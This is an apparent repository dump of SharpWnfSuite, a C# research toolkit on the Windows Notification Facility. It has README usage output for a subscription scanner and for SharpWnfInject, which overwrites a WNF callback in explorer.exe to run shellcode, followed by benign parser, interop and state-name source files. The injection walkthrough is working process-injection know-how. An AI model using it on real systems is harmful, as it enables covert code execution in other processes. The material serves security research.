WNF_NAME_SUBSCRIPTION @ 0x0000000005099950
StateName : 0x41960A2EA3BC1835 (WNF_CDP_CDPUSERSVC_READY)
--snip--
```
If you want to get WNF_USER_SUBSCRIPTION information, set `-v` flag as follows:
```
PS C:\Dev> .\SharpWnfScan.exe -p 5800 -v
Process ID : 5800
Image File Name : C:\Windows\explorer.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x0000000001206660
WNF_NAME_SUBSCRIPTION @ 0x0000000001206B00
StateName : 0x0280032EA3BC0875 (WNF_CMFC_FEATURE_CONFIGURATION_CHANGED)
WNF_USER_SUBSCRIPTION @ 0x0000000001206A40
Callback @ 0x00007FFE88478470 (ntdll!RtlNotifyFeatureUsage+0x1C0)
Context @ 0x00007FFE886F0B20 (ntdll!NlsAnsiCodePage+0x2390)
WNF_NAME_SUBSCRIPTION @ 0x000000000120AD10
StateName : 0x418B1929A3BC3835 (WNF_DWM_DUMP_REQUEST)
WNF_USER_SUBSCRIPTION @ 0x0000000001207FD0
Callback @ 0x00007FF7073027C0 (explorer)
Context @ 0x0000000001208CC0 (N/A)
--snip--
```
You can specifies target processes by name with `-P` option:
```
PS C:\Dev> .\SharpWnfScan.exe -P notepad
Process ID : 8720
Image File Name : C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2401.26.0_arm64__8wekyb3d8bbwe\Notepad\Notepad.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x000001DE2B007560
WNF_NAME_SUBSCRIPTION @ 0x000001DE2B02D640
StateName : 0x41C61629A3BC2835 (WNF_DX_MONITOR_CHANGE_NOTIFICATION)
WNF_NAME_SUBSCRIPTION @ 0x000001DE2B03E040
StateName : 0x41950223A3BC1035 (WNF_NLS_USER_UILANG_CHANGED)
--snip--
```
To filter with state name, set hex or well know wnf name string to `-n` option as follows:
```
PS C:\Dev> .\SharpWnfScan.exe -P notepad -n WNF_RPCF_FWMAN_RUNNING
Process ID : 8720
Image File Name : C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2401.26.0_arm64__8wekyb3d8bbwe\Notepad\Notepad.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x000001DE2B007560
WNF_NAME_SUBSCRIPTION @ 0x000001DE2B075040
StateName : 0x07851E3FA3BC0875 (WNF_RPCF_FWMAN_RUNNING)
PS C:\Dev> .\SharpWnfScan.exe -P notepad -n 0x07851E3FA3BC0875
Process ID : 8720
Image File Name : C:\Program Files\WindowsApps\Microsoft.WindowsNotepad_11.2401.26.0_arm64__8wekyb3d8bbwe\Notepad\Notepad.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x000001DE2B007560
WNF_NAME_SUBSCRIPTION @ 0x000001DE2B075040
StateName : 0x07851E3FA3BC0875 (WNF_RPCF_FWMAN_RUNNING)
```
To dump all processes at a time, use `-a` option:
```
PS C:\Dev> .\SharpWnfScan.exe -a
Process ID : 1180
Image File Name : C:\Windows\System32\svchost.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x000002101A806560
WNF_NAME_SUBSCRIPTION @ 0x000002101A830120
StateName : 0x07851E3FA3BC0875 (WNF_RPCF_FWMAN_RUNNING)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C1C0
StateName : 0x41C64E6DA3B0E045 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A833C50
StateName : 0x41C64E6DA3BC6145 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A846A50
StateName : 0x41C64E6DA3BD0945 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86CA00
StateName : 0x41C64E6DA3BB8045 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A806A00
StateName : 0x0280032EA3BC0875 (WNF_CMFC_FEATURE_CONFIGURATION_CHANGED)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C4C0
StateName : 0x41C64E6DA3B1E045 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C700
StateName : 0x41C64E6DA3A0F945 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x000002101A830EE0
StateName : 0x4195003AA3BC0875 (WNF_WNS_CONNECTIVITY_STATUS)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C880
StateName : 0x41C6072FA3BC3875 (WNF_BI_APPLICATION_SERVICING_START_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86CC40
StateName : 0x41C6072FA3BC1875 (WNF_BI_USER_LOGOFF_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A835E90
StateName : 0x41C6072FA3BC1075 (WNF_BI_USER_LOGON_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86CD00
StateName : 0x41C6072FA3BC2875 (WNF_BI_SESSION_DISCONNECT_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86CAC0
StateName : 0x41C6072FA3BC2075 (WNF_BI_SESSION_CONNECT_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C940
StateName : 0x41840B3EA3BC2075 (WNF_SEB_NETWORK_STATE_CHANGES)
WNF_NAME_SUBSCRIPTION @ 0x000002101A853920
StateName : 0x41C6072FA3BC3075 (WNF_BI_APPLICATION_UNINSTALL_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A836040
StateName : 0x41C6072FA3BC4875 (WNF_BI_LOCK_SCREEN_UPDATE_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C580
StateName : 0x41C6072FA3BC4075 (WNF_BI_APPLICATION_SERVICING_STOP_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A833B80
StateName : 0x41C6072FA3BC6075 (WNF_BI_QUIET_MODE_UPDATE_CHANNEL)
WNF_NAME_SUBSCRIPTION @ 0x000002101A86C400
StateName : 0x41C6072FA3BC5075 (WNF_BI_EVENT_DELETION)
Process ID : 2952
Image File Name : C:\Windows\System32\svchost.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x0000023DD3A065C0
WNF_NAME_SUBSCRIPTION @ 0x0000023DD3AF8B80
StateName : 0x41C64E6DA3B1E045 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x0000023DD3AF8C40
StateName : 0x41C64E6DA3BC6145 (N/A)
--snip--
```
To enable `SeDebugPrivilege`, set `-d` flag as follows.
This option requires administrative privilege:
```
PS C:\Dev> .\SharpWnfScan.exe -d -P winlogon
[+] SeDebugPrivilege is enabled successfully.
Process ID : 680
Image File Name : C:\Windows\System32\winlogon.exe
Architecture : ARM64
WNF_SUBSCRIPTION_TABLE @ 0x00000265F4E05F80
WNF_NAME_SUBSCRIPTION @ 0x00000265F4E48AE0
StateName : 0x41C64E6DA3BC6145 (N/A)
WNF_NAME_SUBSCRIPTION @ 0x00000265F4E27AD0
StateName : 0x41C61629A3BC1035 (WNF_DX_MODE_CHANGE_NOTIFICATION)
--snip--
```
To list WNF State Names used in the target system, set `-l` flag as follows:
```
PS C:\Dev> .\SharpWnfScan.exe -l
[>] Trying to list WNF State Names used in this system. Wait a moment.
[1304 WNF State Names]
[*] 0x07851E3FA3BC0875 (WNF_RPCF_FWMAN_RUNNING)
[*] 0x41C64E6DA3B0E045 (N/A)
[*] 0x41C64E6DA3BC6145 (N/A)
[*] 0x41C64E6DA3BD0945 (N/A)
[*] 0x41C64E6DA3BB8045 (N/A)
[*] 0x0280032EA3BC0875 (WNF_CMFC_FEATURE_CONFIGURATION_CHANGED)
[*] 0x41C64E6DA3B1E045 (N/A)
--snip--
[16 Access Denied Processes]
[*] svchost (PID : 2352)
[*] svchost (PID : 4952)
[*] MsMpEng (PID : 3132)
--snip--
[*] Done.
```
### SharpWnfInject
[Back to Top](#sharpwnfsuite)
[Project](./SharpWnfSuite/SharpWnfInject)
This tool is to investigate how attackers can abuse WNF for code injection technique:
```
PS C:\Dev> .\SharpWnfInject.exe -h
SharpWnfInject - Tool to investigate WNF code injection technique.
Usage: SharpWnfInject.exe [Options]
-h, --help : Displays this help message.
-n, --name : Specifies WNF State Name to inject. Hex format or Well-known name format is accepted.
-p, --pid : Specifies PID to inject.
-i, --input : Specifies the file path to shellcode.
-d, --debug : Flag to enable SeDebugPrivilege. Requires administrative privilege.
[!] -n option is required.
```
This tool overwrite callback function pointer in `WNF_USER_SUBSCRIPTION` for a specific WNF State Name.
The code injection technique does not work for all WNF State Name.
For example, this technique is known to be available for `WNF_SHEL_WINDOWSTIP_CONTENT_PUBLISHED` used by `explorer.exe` in Windows 11 23H2.
To test this technique, execute this tool as follows:
```
PS C:\Dev> .\SharpWnfInject.exe -p 5800 -n WNF_SHEL_WINDOWSTIP_CONTENT_PUBLISHED -i .\notepad_arm64.bin
[*] Target WNF State Name is 0x0D83063EA3BE10F5 (WNF_SHEL_WINDOWSTIP_CONTENT_PUBLISHED).
[+] Got a handle from the target Process
[*] Process Name : explorer.exe
[*] Process ID : 5800
[*] Image File Name : C:\Windows\explorer.exe
[*] Architecture : ARM64
[+] Pointer for WNF_SUBSCRIPTION_TABLE is at 0x00007FFE886F4E20.
[+] WNF_SUBSCRIPTION_TABLE is at 0x0000000001206660.
[*] WNF_NAME_SUBSCRIPTION is at 0x0000000001273540.
[+] Got 1 WNF_USER_SUBSCRIPTION.
[*] Target callback pointer is at 0x00000000051C2250.
[*] Callback function is at 0x00007FFE54FD4D20 (twinui!DllGetClassObject+0x11AFF0).
[+] Shellcode buffer is at 0x0000000003270000.
[+] 344 bytes shellcode is written successfully.
[+] Callback pointer is overwritten successfully.
[>] Triggering shellcode.
[+] WNF State Data is updated successfully. Shellcode might be executed.
[+] Callback pointer is reverted successfully.
[*] Done.
```
If you want to enable `SeDebugPrivilege`, set `-d` flag and execute with administrative privilege.
Sample shellcodes to execute notepad are located at [Shellcode directory](./SharpWnfSuite/Shellcode).
## KernelPrimitive
[Back to Top](#sharpwnfsuite)
Projects in this directory are to demonstrate WNF primitive for kernel exploitation.
You can read the detailed information in [Alex Plaskett](https://twitter.com/alexjplaskett)'s talk and blogs ([Part 1](https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/), [Part 2](https://research.nccgroup.com/2021/08/17/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-2/), [Slide](https://research.nccgroup.com/2021/11/15/poc2021-pwning-the-windows-10-kernel-with-nfts-and-wnf-slides/)).
Reliability of the PoC is not 100%.
I defined kernel offset for all versions of Windows 10 x64, but only tested in Windows 10 Version 1903 x64.
| Project | Description |
| :--- | :--- |
| [PoolVulnDrv](./KernelPrimitive/PoolVulnDrv/) | This is a vulnerable kernel driver to test WNF kernel primitive. |
| [WnfPoolOverflow](./KernelPrimitive/WnfPoolOverflow/) | This is a PoC to exploit PoolVulnDrv. |
## WnfCallbackPayload
This directory contains documents and sample codes to build your own WNF callback shellcode.
See [README.md](./WnfCallbackPayload/README.md).
## Reference
[Back to Top](#sharpwnfsuite)
+ [Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet](https://www.youtube.com/watch?v=MybmgE95weo)
+ [Playing with the Windows Notification Facility (WNF)](https://blog.quarkslab.com/playing-with-the-windows-notification-facility-wnf.html)
+ [wnfun](https://github.com/ionescu007/wnfun)
+ [Windows Process Injection : Windows Notification Facility](https://modexp.wordpress.com/2019/06/15/4083/)
+ [New WNF User Subscription Structures in Windows 11](https://mishap.dev/posts/new-wnf-user-subscription-structures-in-w11/)
+ [CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1](https://research.nccgroup.com/2021/07/15/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-1/)
+ [CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 2](https://research.nccgroup.com/2021/08/17/cve-2021-31956-exploiting-the-windows-kernel-ntfs-with-wnf-part-2/)
+ [POC2021 – Pwning the Windows 10 Kernel with NTFS and WNF Slides](https://research.nccgroup.com/2021/11/15/poc2021-pwning-the-windows-10-kernel-with-nfts-and-wnf-slides/)
## Acknowledgments
[Back to Top](#sharpwnfsuite)
Thanks for your research:
+ Alex Ionescu ([@aionescu](https://twitter.com/aionescu))
+ Gabrielle Viala ([@pwissenlit](https://twitter.com/pwissenlit))
+ odzhan ([@modexpblog](https://twitter.com/modexpblog))
+ Alex Plaskett ([@alexjplaskett](https://twitter.com/alexjplaskett))
Thanks for your help:
+ mishap ([@oopsmishap](https://twitter.com/oopsmishap))
================================================
FILE: SharpWnfSuite/SharpWnfClient/App.config
================================================
<?xml version="1.0" encoding="utf-8"?>
<configuration>
<startup>
<supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5.2"/>
</startup>
</configuration>
================================================
FILE: SharpWnfSuite/SharpWnfClient/Handler/CommandLineParser.cs
================================================
using System;
using System.Collections.Generic;
using System.Text;
namespace SharpWnfClient.Handler
{
internal class CommandLineParser
{
private class CommandLineOption
{
readonly OptionType Type;
readonly bool IsRequired;
bool IsParsed;
readonly string BriefName;
readonly string FullName;
bool Flag;
string Value;
readonly string Description;
public CommandLineOption(
bool _isRequired,
string _briefName,
string _fullName,
string _description)
{
this.Type = OptionType.Flag;
this.IsRequired = _isRequired;
this.IsParsed = false;
this.BriefName = _briefName;
this.FullName = _fullName;
this.Flag = false;
this.Value = null;
this.Description = _description;
}
public CommandLineOption(
bool _isRequired,
string _briefName,
string _fullName,
string _value,
string _description)
{
if (_briefName != _fullName)
this.Type = OptionType.Parameter;
else
this.Type = OptionType.Argument;
this.IsRequired = _isRequired;
this.IsParsed = false;
this.BriefName = _briefName;
this.FullName = _fullName;
this.Flag = false;
this.Value = _value;
this.Description = _description;
}
public string GetBriefName()
{
return this.BriefName;
}
public string GetDescription()
{
return this.Description;
}
public bool GetFlag()
{
if (this.Type != OptionType.Flag)
throw new InvalidOperationException(string.Format(
"{0} option is not flag option.",
this.FullName));
return this.Flag;
}
public string GetFullName()
{
return this.FullName;
}
public bool GetIsParsed()
{
return this.IsParsed;
}
public bool GetIsRequired()
{
return this.IsRequired;
}
public OptionType GetOptionType()
{
return this.Type;
}
public string GetValue()
{
if (this.Type == OptionType.Flag)
throw new InvalidOperationException(string.Format(
"{0} option is flag option.",
this.FullName));
return this.Value;
}
public void SetFlag()
{
this.Flag = !this.Flag;
}
public void SetIsParsed()
{
this.IsParsed = true;
}
public void SetValue(string _value)
{
this.Value = _value;
}
}
private enum OptionType
{
Flag,
Parameter,
Argument
}
private string g_Title = null;
private string g_OptionName = null;
private readonly List<CommandLineOption> g_Options =
new List<CommandLineOption>();
private readonly List<List<string>> g_Exclusive = new List<List<string>>();
public void AddArgument(
bool isRequired,
string name,
string description)
{
foreach (var opt in g_Options)
{
if (opt.GetBriefName() == name || opt.GetFullName() == name)
{
throw new InvalidOperationException(string.Format(
"[!] {0} option is defined multiple times.\n",
name));
}
}
CommandLineOption newOption = new CommandLineOption(
isRequired,
name,
name,
null,
description);
g_Options.Add(newOption);
}
public void AddFlag(
bool isRequired,
string briefName,
string fullName,
string description)
{
briefName = string.Format("-{0}", briefName);
fullName = string.Format("--{0}", fullName);
foreach (var opt in g_Options)
{
if (opt.GetBriefName() == briefName ||
opt.GetFullName() == briefName ||
opt.GetBriefName() == fullName ||
opt.GetFullName() == fullName)
{
throw new InvalidOperationException(string.Format(
"[!] {0} option is defined multiple times.\n",
fullName));
}
}
CommandLineOption newOption = new CommandLineOption(
isRequired,
briefName,
fullName,
description);
g_Options.Add(newOption);
}
public void AddParameter(
bool isRequired,
string briefName,
string fullName,
string value,
string description)
{
briefName = string.Format("-{0}", briefName);
fullName = string.Format("--{0}", fullName);
foreach (var opt in g_Options)
{
if (opt.GetBriefName() == briefName ||
opt.GetFullName() == briefName ||
opt.GetBriefName() == fullName ||
opt.GetFullName() == fullName)
{
throw new InvalidOperationException(string.Format(
"[!] {0} option is already defined.\n",
fullName));
}
}
CommandLineOption newOption = new CommandLineOption(
isRequired,
briefName,
fullName,
value,
description);
g_Options.Add(newOption);
}
public void AddExclusive(List<string> exclusive)
{
g_Exclusive.Add(exclusive);
}
public bool GetFlag(string key)
{
try
{
foreach (var opt in g_Options)
{
if (opt.GetFullName().TrimStart('-') == key)
{
return opt.GetFlag();
}
}
}
catch (InvalidOperationException ex)
{
throw new InvalidOperationException(string.Format("[!] {0}\n", ex.Message));
}
throw new InvalidOperationException("[!] Option is not found.\n");
}
public void GetHelp()
{
StringBuilder usage = new StringBuilder();
if (g_Title != null)
{
Console.WriteLine("\n{0}", g_Title);
}
if (g_OptionName != null)
{
usage.Append(string.Format(
"\nUsage: {0} {1} [Options]",
AppDomain.CurrentDomain.FriendlyName,
g_OptionName));
}
else
{
usage.Append(string.Format(
"\nUsage: {0} [Options]",
AppDomain.CurrentDomain.FriendlyName));
}
foreach (var opt in g_Options)
{
if (opt.GetOptionType() == OptionType.Argument)
{
if (opt.GetIsRequired())
{
usage.Append(string.Format(
" <{0}>",
opt.GetFullName()));
}
else
{
usage.Append(string.Format(
" [{0}]",
opt.GetFullName()));
}
}
}
Console.WriteLine(usage);
ListOptions();
}
public string GetValue(string key)
{
try
{
foreach (var opt in g_Options)
{
if (opt.GetFullName().TrimStart('-') == key)
{
return opt.GetValue();
}
}
}
catch (InvalidOperationException ex)
{
throw new InvalidOperationException(string.Format("[!] {0}\n", ex.Message));
}
throw new InvalidOperationException("[!] Option is not found.\n");
}
public void ListOptions()
{
string formatter;
int maximumLength = 0;
if (g_Options.Count == 0)
{
return;
}
foreach (var opt in g_Options)
{
if (opt.GetOptionType() == OptionType.Argument)
{
formatter = string.Format(
"{0}",
opt.GetFullName());
}
else
{
formatter = string.Format(
"{0}, {1}",
opt.GetBriefName(),
opt.GetFullName());
}
if (formatter.Length > maximumLength)
{
maximumLength = formatter.Length;
}
}
formatter = string.Format("\t{{0,-{0}}} : {{1}}", maximumLength);
Console.WriteLine();
foreach (var opt in g_Options)
{
if (opt.GetOptionType() == OptionType.Argument)
{
Console.WriteLine(string.Format(
formatter,
opt.GetFullName(),
opt.GetDescription()));
}
else
{
Console.WriteLine(string.Format(
formatter,
string.Format("{0}, {1}", opt.GetBriefName(), opt.GetFullName()),
opt.GetDescription()));
}
}
Console.WriteLine();
}
public string[] Parse(string[] args)
{
StringBuilder exceptionMessage = new StringBuilder();
List<string> reminder = new List<string>();
for (var idx = 0; idx < args.Length; idx++)
{
foreach (var opt in g_Options)
{
if ((opt.GetBriefName() == args[idx] || opt.GetFullName() == args[idx]) &&
(opt.GetOptionType() == OptionType.Flag))
{
if (opt.GetIsParsed())
{
exceptionMessage.Append(string.Format(
"[!] {0} option is declared multiple times.\n",
opt.GetFullName()));
throw new ArgumentException(exceptionMessage.ToString());
}
opt.SetIsParsed();
opt.SetFlag();
args[idx] = null;
break;
}
else if ((opt.GetBriefName() == args[idx] || opt.GetFullName() == args[idx]) &&
(opt.GetOptionType() == OptionType.Parameter))
{
if (opt.GetIsParsed())
{
exceptionMessage.Append(string.Format(
"[!] {0} option is declared multiple times.\n",
opt.GetFullName()));
throw new ArgumentException(exceptionMessage.ToString());
}
if (idx + 1 >= args.Length)
{
exceptionMessage.Append(string.Format(
"[!] Missing the value for {0} option.\n",
opt.GetBriefName()));
throw new ArgumentException(exceptionMessage.ToString());
}
opt.SetIsParsed();
args[idx] = null;
opt.SetValue(args[++idx]);
args[idx] = null;
break;
}
}
if (args[idx] != null)
{
foreach (var opt in g_Options)
{
if (opt.GetOptionType() == OptionType.Argument &&
!opt.GetIsParsed())
{
opt.SetIsParsed();
opt.SetValue(args[idx]);
args[idx] = null;
break;
}
}
}
if (args[idx] != null)
reminder.Add(args[idx]);
}
foreach (var opt in g_Options)
{
if (opt.GetIsRequired() && !opt.GetIsParsed())
{
exceptionMessage.Append(string.Format(
"[!] {0} option is required.\n",
opt.GetBriefName()));
throw new ArgumentException(exceptionMessage.ToString());
}
}
int exclusiveCounter;
string fullName;
foreach (var exclusiveList in g_Exclusive)
{
exclusiveCounter = 0;
foreach (var exclusive in exclusiveList)
{
fullName = string.Format("--{0}", exclusive.TrimStart('-'));
foreach (var opt in g_Options)
{
if (opt.GetFullName() == fullName && opt.GetIsParsed())
exclusiveCounter++;
}
}
if (exclusiveCounter > 1)
{
exceptionMessage.Append("[!] Following options should not be set at a time:\n\n");
foreach (var exclusive in exclusiveList)
{
fullName = string.Format("--{0}", exclusive.TrimStart('-'));
exceptionMessage.Append(string.Format("\t+ {0} option\n", fullName));
}
throw new ArgumentException(exceptionMessage.ToString());
}
}
return reminder.ToArray();
}
public void SetOptionName(string optionName)
{
g_OptionName = optionName;
}
public void SetTitle(string title)
{
g_Title = title;
}
}
}
================================================
FILE: SharpWnfSuite/SharpWnfClient/Handler/Execute.cs
================================================
using SharpWnfClient.Library;
namespace SharpWnfClient.Handler
{
internal class Execute
{
public static void Run(CommandLineParser options)
{
if (options.GetFlag("help"))
{
options.GetHelp();
}
else
{
using (var wnfClient = new WnfCom())
{
if (wnfClient.SetStateName(options.GetValue("WNF_NAME")))
wnfClient.Listen();
}
}
}
}
}
================================================
FILE: SharpWnfSuite/SharpWnfClient/Interop/NativeMethods.cs
================================================
using System;
using System.Runtime.InteropServices;
namespace SharpWnfClient.Interop
{
using NTSTATUS = Int32;
internal class NativeMethods
{
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtClose(IntPtr Handle);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtCreateEvent(
out IntPtr EventHandle,
ACCESS_MASK DesiredAccess,
IntPtr /* POBJECT_ATTRIBUTES */ ObjectAttributes,
EVENT_TYPE EventType,
BOOLEAN InitialState);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtCreateWnfStateName(
out ulong StateName,
WNF_STATE_NAME_LIFETIME NameLifetime,
WNF_DATA_SCOPE DataScope,
bool PersistData,
IntPtr TypeId,
int MaximumStateSize,
IntPtr SecurityDescriptor);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtOpenKey(
out IntPtr KeyHandle,
ACCESS_MASK DesiredAccess,
in OBJECT_ATTRIBUTES ObjectAttributes);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtQueryValueKey(
IntPtr KeyHandle,
in UNICODE_STRING ValueName,
KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
IntPtr KeyValueInformation,
uint Length,
out uint ResultLength);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtQueryWnfStateData(
in ulong StateName,
IntPtr TypeId,
IntPtr ExplicitScope,
out int ChangeStamp,
IntPtr Buffer,
ref uint BufferSize);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtUpdateWnfStateData(
in ulong StateName,
IntPtr Buffer,
int Length,
IntPtr TypeId,
IntPtr ExplicitScope,
int MatchingChangeScope,
int CheckStamp);
[DllImport("ntdll.dll")]
public static extern NTSTATUS NtWaitForSingleObject(
IntPtr Handle,
BOOLEAN Alertable,
in LARGE_INTEGER Timeout);
[DllImport("ntdll.dll")]
public static extern NTSTATUS RtlSubscribeWnfStateChangeNotification(
out IntPtr Subscription,
ulong StateName,
int ChangeStamp,
IntPtr Callback,
IntPtr CallbackContext,
IntPtr TypeId,
int SerializationGroup,
int Unknown);
[DllImport("ntdll.dll")]
public static extern NTSTATUS RtlUnsubscribeWnfStateChangeNotification(
IntPtr Subscription);
}
}
================================================
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1507.cs
================================================
namespace SharpWnfClient.Interop
{
internal enum WELL_KNOWN_WNF_NAME_1507 : ulong
{
WNF_BRU_BACKUP = 0x41931C2FA3BC1035UL,
WNF_BRU_REBOOT = 0x41931C2FA3BC0835UL,
WNF_CNET_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC4875UL,
WNF_CNET_DPU_GLOBAL_STATE_NOT_TRACKED = 0x1583002EA3BC3075UL,
WNF_CNET_DPU_GLOBAL_STATE_OFF_TRACK = 0x1583002EA3BC1875UL,
WNF_CNET_DPU_GLOBAL_STATE_ON_TRACK = 0x1583002EA3BC2075UL,
WNF_CNET_DPU_GLOBAL_STATE_OVER_LIMIT = 0x1583002EA3BC1075UL,
WNF_CNET_DPU_GLOBAL_STATE_UNDER_TRACK = 0x1583002EA3BC2875UL,
WNF_CNET_NON_CELLULAR_CONNECTED = 0x1583002EA3BC6875UL,
WNF_CNET_NON_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC5075UL,
WNF_CNET_RADIO_ACTIVITY_OR_NON_CELLULAR_CONNECTED = 0x1583002EA3BC7075UL,
WNF_IME_INPUT_MODE_LABEL = 0x41830324A3BC0875UL,
WNF_KSV_STREAMSTATE = 0x41901D26A3BC0875UL,
WNF_OSWN_STORAGE_FINISHED_USAGE_CATEGORY_UPDATE = 0x0F911D22A3BCB875UL,
WNF_OSWN_STORAGE_FREE_SPACE_CHANGE = 0x0F911D22A3BC7075UL,
WNF_OSWN_STORAGE_PRESENCE_CHANGE = 0x0F911D22A3BC6075UL,
WNF_OSWN_STORAGE_SHELLHWD_EVENT = 0x0F911D22A3BCC075UL,
WNF_OSWN_STORAGE_TEMP_CLEANUP_CHANGE = 0x0F911D22A3BC7875UL,
WNF_OSWN_STORAGE_VOLUME_STATUS_CHANGE = 0x0F911D22A3BC6875UL,
WNF_OSWN_SYSTEM_CLOCK_CHANGED = 0x0F911D22A3BC5875UL,
WNF_PHN_CALL_STATUS = 0x4188063DA3BC2875UL,
WNF_PHN_CALLFORWARDING_STATUS_LINE0 = 0x4188063DA3BC3075UL,
WNF_PHNL_LINE1_READY = 0x0D88063DA3BC4075UL,
WNF_PHNP_ANNOTATION_ENDPOINT = 0x1188063DA3BC4875UL,
WNF_PHNP_SERVICE_INITIALIZED = 0x1188063DA3BC3875UL,
WNF_PHNP_SIMSEC_READY = 0x1188063DA3BC4075UL,
WNF_SEB_AIRPLANE_MODE_DISABLED_FOR_EMERGENCY_CALL = 0x41840B3EA3BD7075UL,
WNF_SEB_APP_LAUNCH_PREFETCH = 0x41840B3EA3BD1075UL,
WNF_SEB_APP_RESUME = 0x41840B3EA3BD2075UL,
WNF_SEB_BACKGROUND_WORK_COST_CHANGE = 0x41840B3EA3BC8875UL,
WNF_SEB_BACKGROUND_WORK_COST_HIGH = 0x41840B3EA3BC9075UL,
WNF_SEB_BATTERY_LEVEL = 0x41840B3EA3BC5075UL,
WNF_SEB_BOOT = 0x41840B3EA3BC6075UL,
WNF_SEB_CACHED_FILE_UPDATED = 0x41840B3EA3BCC875UL,
WNF_SEB_CALL_HISTORY_CHANGED = 0x41840B3EA3BD6075UL,
WNF_SEB_CALL_STATE_CHANGED = 0x41840B3EA3BD5075UL,
WNF_SEB_DEPRECATED1 = 0x41840B3EA3BD1875UL,
WNF_SEB_DEPRECATED2 = 0x41840B3EA3BD2875UL,
WNF_SEB_DEPRECATED3 = 0x41840B3EA3BD3075UL,
WNF_SEB_DEPRECATED4 = 0x41840B3EA3BD3875UL,
WNF_SEB_DEPRECATED5 = 0x41840B3EA3BD4075UL,
WNF_SEB_DEPRECATED6 = 0x41840B3EA3BD4875UL,
WNF_SEB_DEV_MNF_CUSTOM_NOTIFICATION_RECEIVED = 0x41840B3EA3BCB875UL,
WNF_SEB_DOMAIN_JOINED = 0x41840B3EA3BC5875UL,
WNF_SEB_FREE_NETWORK_PRESENT = 0x41840B3EA3BC1075UL,
WNF_SEB_FULL_SCREEN_VIDEO_PLAYBACK = 0x41840B3EA3BD0075UL,
WNF_SEB_GEOLOCATION = 0x41840B3EA3BCB075UL,
WNF_SEB_INTERNET_PRESENT = 0x41840B3EA3BC0875UL,
WNF_SEB_IP_ADDRESS_AVAILABLE = 0x41840B3EA3BC8075UL,
WNF_SEB_LINE_CHANGED = 0x41840B3EA3BD6875UL,
WNF_SEB_LOW_LATENCY_POWER_REQUEST = 0x41840B3EA3BCF075UL,
WNF_SEB_MBAE_NOTIFICATION_RECEIVED = 0x41840B3EA3BC2875UL,
WNF_SEB_MOB_OPERATOR_CUSTOM_NOTIFICATION_RECEIVED = 0x41840B3EA3BCC075UL,
WNF_SEB_MOBILE_BROADBAND_DEVICE_SERVICE_NOTIFICATION = 0x41840B3EA3BD9075UL,
WNF_SEB_MOBILE_BROADBAND_PIN_LOCK_STATE_CHANGE = 0x41840B3EA3BD8875UL,
WNF_SEB_MOBILE_BROADBAND_RADIO_STATE_CHANGE = 0x41840B3EA3BD8075UL,
WNF_SEB_MOBILE_BROADBAND_REGISTRATION_STATE_CHANGE = 0x41840B3EA3BD7875UL,
WNF_SEB_MONITOR_ON = 0x41840B3EA3BC7875UL,
WNF_SEB_NETWORK_CONTROL_CHANNEL_TRIGGER_RESET = 0x41840B3EA3BC3075UL,
WNF_SEB_NETWORK_STATE_CHANGES = 0x41840B3EA3BC2075UL,
WNF_SEB_NFC_PERF_BOOST = 0x41840B3EA3BD0875UL,
WNF_SEB_NON_OFFLOADED_AUDIO = 0x41840B3EA3BCE875UL,
WNF_SEB_OFFLOADED_AUDIO = 0x41840B3EA3BCE075UL,
WNF_SEB_ONLINE_ID_CONNECTED_STATE_CHANGE = 0x41840B3EA3BC4075UL,
WNF_SEB_RESILIENCY_NOTIFICATION_PHASE = 0x41840B3EA3BCF875UL,
WNF_SEB_SMART_CARD_FIELD_INFO_NOTIFICATION = 0x41840B3EA3BCD075UL,
WNF_SEB_SMART_CARD_HCE_APPLICATION_ACTIVATION_NOTIFICATION = 0x41840B3EA3BCD875UL,
WNF_SEB_SMART_CARD_TRANSACTION_NOTIFICATION = 0x41840B3EA3BCA075UL,
WNF_SEB_SMS_RECEIVED = 0x41840B3EA3BC1875UL,
WNF_SEB_SYSTEM_AC = 0x41840B3EA3BC7075UL,
